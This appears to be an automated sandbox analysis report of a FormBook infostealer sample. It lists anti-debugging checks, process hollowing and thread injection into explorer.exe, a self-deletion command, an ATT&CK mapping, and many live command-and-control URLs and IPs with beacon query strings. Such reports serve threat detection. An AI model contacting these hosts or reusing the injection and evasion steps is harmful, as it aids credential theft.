Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01704A35 mov eax, dword ptr fs:[00000030h]	2_2_01704A35
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01704A35 mov eax, dword ptr fs:[00000030h]	2_2_01704A35
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171CA38 mov eax, dword ptr fs:[00000030h]	2_2_0171CA38
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171CA24 mov eax, dword ptr fs:[00000030h]	2_2_0171CA24
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170EA2E mov eax, dword ptr fs:[00000030h]	2_2_0170EA2E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176CA11 mov eax, dword ptr fs:[00000030h]	2_2_0176CA11
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171AAEE mov eax, dword ptr fs:[00000030h]	2_2_0171AAEE
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171AAEE mov eax, dword ptr fs:[00000030h]	2_2_0171AAEE
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01714AD0 mov eax, dword ptr fs:[00000030h]	2_2_01714AD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01714AD0 mov eax, dword ptr fs:[00000030h]	2_2_01714AD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0AD0 mov eax, dword ptr fs:[00000030h]	2_2_016E0AD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]	2_2_01736ACC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]	2_2_01736ACC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01736ACC mov eax, dword ptr fs:[00000030h]	2_2_01736ACC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8AA0 mov eax, dword ptr fs:[00000030h]	2_2_016E8AA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8AA0 mov eax, dword ptr fs:[00000030h]	2_2_016E8AA0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01736AA4 mov eax, dword ptr fs:[00000030h]	2_2_01736AA4
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01718A90 mov edx, dword ptr fs:[00000030h]	2_2_01718A90
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EEA80 mov eax, dword ptr fs:[00000030h]	2_2_016EEA80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017B4A80 mov eax, dword ptr fs:[00000030h]	2_2_017B4A80
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01778D6B mov eax, dword ptr fs:[00000030h]	2_2_01778D6B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]	2_2_016E0D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]	2_2_016E0D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0D59 mov eax, dword ptr fs:[00000030h]	2_2_016E0D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]	2_2_016E8D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]	2_2_016E8D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]	2_2_016E8D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]	2_2_016E8D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8D59 mov eax, dword ptr fs:[00000030h]	2_2_016E8D59
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01768D20 mov eax, dword ptr fs:[00000030h]	2_2_01768D20
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01798D10 mov eax, dword ptr fs:[00000030h]	2_2_01798D10
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01798D10 mov eax, dword ptr fs:[00000030h]	2_2_01798D10
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01714D1D mov eax, dword ptr fs:[00000030h]	2_2_01714D1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FAD00 mov eax, dword ptr fs:[00000030h]	2_2_016FAD00

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Code function: 2_2_0040ACF0 LdrLoadDll,

2_2_0040ACF0

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.186.223.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.69.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.19.157.23 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.247.82.51 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 450000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Memory written: C:\Users\user\Desktop\GCeHcfCef8.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Thread register set: target process: 2592			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 2592			Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Process created: C:\Users\user\Desktop\GCeHcfCef8.exe C:\Users\user\Desktop\GCeHcfCef8.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GCeHcfCef8.exe"			Jump to behavior

Source: explorer.exe, 00000003.00000003.3084610828.00000000088B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325736830.0000000004040000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000088B8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1324357562.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3791650388.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanZw
Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.3796083410.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1324536381.0000000000BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: yProgram Manager

Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Queries volume information: C:\Users\user\Desktop\GCeHcfCef8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\GCeHcfCef8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	Path Interception	612 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	612 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Timestomp	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GCeHcfCef8.exe	46%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
GCeHcfCef8.exe	56%	Virustotal		Browse
GCeHcfCef8.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
totalkfood.com	1%	Virustotal	Browse
www.nightoracle.com	6%	Virustotal	Browse
www.mtauratarnt.com	1%	Virustotal	Browse
www.m-baer.com	6%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
cname.beehiiv.com	0%	Virustotal	Browse
www.robertjamesfineclothing.com	9%	Virustotal	Browse
www.cryptarrow.com	4%	Virustotal	Browse
www.starryallure.com	8%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.micro	0%	URL Reputation	safe
http://www.cryptarrow.com	0%	Avira URL Cloud	safe
http://www.mtauratarnt.com	0%	Avira URL Cloud	safe
http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs	100%	Avira URL Cloud	malware
http://www.cleaning-products-29334.bond	0%	Avira URL Cloud	safe
http://www.zg9tywlubmftzw5ldzi0mdm.com	0%	Avira URL Cloud	safe
http://www.rewmio.xyz	0%	Avira URL Cloud	safe
http://www.cleaning-products-29334.bond	2%	Virustotal		Browse
http://www.mtauratarnt.com	1%	Virustotal		Browse
http://www.rewmio.xyz/rs10/www.totalkfood.com	100%	Avira URL Cloud	phishing
http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/	100%	Avira URL Cloud	malware
http://www.cryptarrow.com	4%	Virustotal		Browse
http://www.cryptarrow.comReferer:	0%	Avira URL Cloud	safe
http://www.calm-plants.com/rs10/	0%	Avira URL Cloud	safe
http://www.robertjamesfineclothing.com	100%	Avira URL Cloud	phishing
http://www.guillaumecarreau.com/rs10/	100%	Avira URL Cloud	malware
http://www.robertjamesfineclothing.com	9%	Virustotal		Browse
http://www.cleaning-products-29334.bond/rs10/	0%	Avira URL Cloud	safe
http://www.totalkfood.comReferer:	0%	Avira URL Cloud	safe
http://www.cryptarrow.com/rs10/www.starryallure.com	100%	Avira URL Cloud	malware
http://www.roundaboutlogistics.comReferer:	0%	Avira URL Cloud	safe
http://www.omarshafie.online	0%	Avira URL Cloud	safe
http://www.roundaboutlogistics.com	0%	Avira URL Cloud	safe
http://www.rewmio.xyz	2%	Virustotal		Browse
http://www.m-baer.com	0%	Avira URL Cloud	safe
http://www.mtauratarnt.com/rs10/	100%	Avira URL Cloud	malware
http://www.cryptarrow.com/rs10/	100%	Avira URL Cloud	malware
http://www.cryptarrow.com/rs10/www.starryallure.com	2%	Virustotal		Browse
http://www.nightoracle.comReferer:	0%	Avira URL Cloud	safe
http://www.starryallure.com/rs10/www.roundaboutlogistics.com	100%	Avira URL Cloud	malware
http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs	100%	Avira URL Cloud	malware
http://www.m-baer.com	6%	Virustotal		Browse
http://www.guillaumecarreau.comReferer:	0%	Avira URL Cloud	safe
http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs	100%	Avira URL Cloud	malware
http://www.mtauratarnt.com/rs10/	2%	Virustotal		Browse
http://www.cryptarrow.com/rs10/	2%	Virustotal		Browse
https://login.microsoftonline.co	100%	Avira URL Cloud	phishing
http://www.hdlive7.live/rs10/	100%	Avira URL Cloud	malware
http://www.robertjamesfineclothing.com/rs10/	100%	Avira URL Cloud	malware
http://www.robertjamesfineclothing.comReferer:	0%	Avira URL Cloud	safe
http://www.totalkfood.com/rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs	0%	Avira URL Cloud	safe
http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com	100%	Avira URL Cloud	malware
http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs	100%	Avira URL Cloud	malware
http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond	100%	Avira URL Cloud	malware
http://www.mtauratarnt.comReferer:	0%	Avira URL Cloud	safe
www.nightoracle.com/rs10/	100%	Avira URL Cloud	malware
http://www.m-baer.com/rs10/	100%	Avira URL Cloud	malware
https://login.microsoftonline.co	0%	Virustotal		Browse
http://www.m-baer.comReferer:	0%	Avira URL Cloud	safe
http://www.m-baer.com/rs10/www.rewmio.xyz	100%	Avira URL Cloud	malware
http://www.fhstbanknigeria.com/rs10/www.m-baer.com	0%	Avira URL Cloud	safe
http://www.rewmio.xyz/rs10/	100%	Avira URL Cloud	phishing
https://passwordreset.micros	0%	Avira URL Cloud	safe
http://www.totalkfood.com/rs10/www.cryptarrow.com	0%	Avira URL Cloud	safe
https://account.activedirectory.	0%	Avira URL Cloud	safe
http://www.hdlive7.live	100%	Avira URL Cloud	malware
http://www.guillaumecarreau.com/rs10/www.omarshafie.online	100%	Avira URL Cloud	malware
http://www.totalkfood.com/rs10/	0%	Avira URL Cloud	safe
http://www.guillaumecarreau.com	100%	Avira URL Cloud	malware
http://www.fhstbanknigeria.com/rs10/	0%	Avira URL Cloud	safe
http://www.nightoracle.com/rs10/	100%	Avira URL Cloud	malware
http://www.starryallure.comReferer:	0%	Avira URL Cloud	safe
http://www.starryallure.com/rs10/	100%	Avira URL Cloud	malware
https://account.li	0%	Avira URL Cloud	safe
http://www.starryallure.com	100%	Avira URL Cloud	malware
http://www.omarshafie.online/rs10/	0%	Avira URL Cloud	safe
http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:	0%	Avira URL Cloud	safe
http://www.nightoracle.com	100%	Avira URL Cloud	phishing
http://www.cleaning-products-29334.bondReferer:	0%	Avira URL Cloud	safe
http://www.roundaboutlogistics.com/rs10/www.nightoracle.com	0%	Avira URL Cloud	safe
http://www.calm-plants.com/rs10/www.hdlive7.live	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
totalkfood.com	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.nightoracle.com	103.224.212.210	true	true	6%, Virustotal, Browse	unknown
www.fhstbanknigeria.com	103.224.212.212	true	true		unknown
www.mtauratarnt.com	104.21.69.174	true	true	1%, Virustotal, Browse	unknown
www.m-baer.com	35.186.223.180	true	false	6%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	true	0%, Virustotal, Browse	unknown
cname.beehiiv.com	104.19.157.23	true	true	0%, Virustotal, Browse	unknown
www.robertjamesfineclothing.com	104.247.82.51	true	true	9%, Virustotal, Browse	unknown
www.zg9tywlubmftzw5ldzi0mdm.com	unknown	unknown	true		unknown
www.totalkfood.com	unknown	unknown	true		unknown
www.cryptarrow.com	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.roundaboutlogistics.com	unknown	unknown	true		unknown
www.starryallure.com	unknown	unknown	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs	true	Avira URL Cloud: malware	unknown
http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs	false	Avira URL Cloud: malware	unknown
http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs	true	Avira URL Cloud: malware	unknown
http://www.totalkfood.com/rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs	true	Avira URL Cloud: safe	unknown
http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs	true	Avira URL Cloud: malware	unknown
www.nightoracle.com/rs10/	true	Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.cleaning-products-29334.bond	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mtauratarnt.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.cryptarrow.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.zg9tywlubmftzw5ldzi0mdm.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rewmio.xyz	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
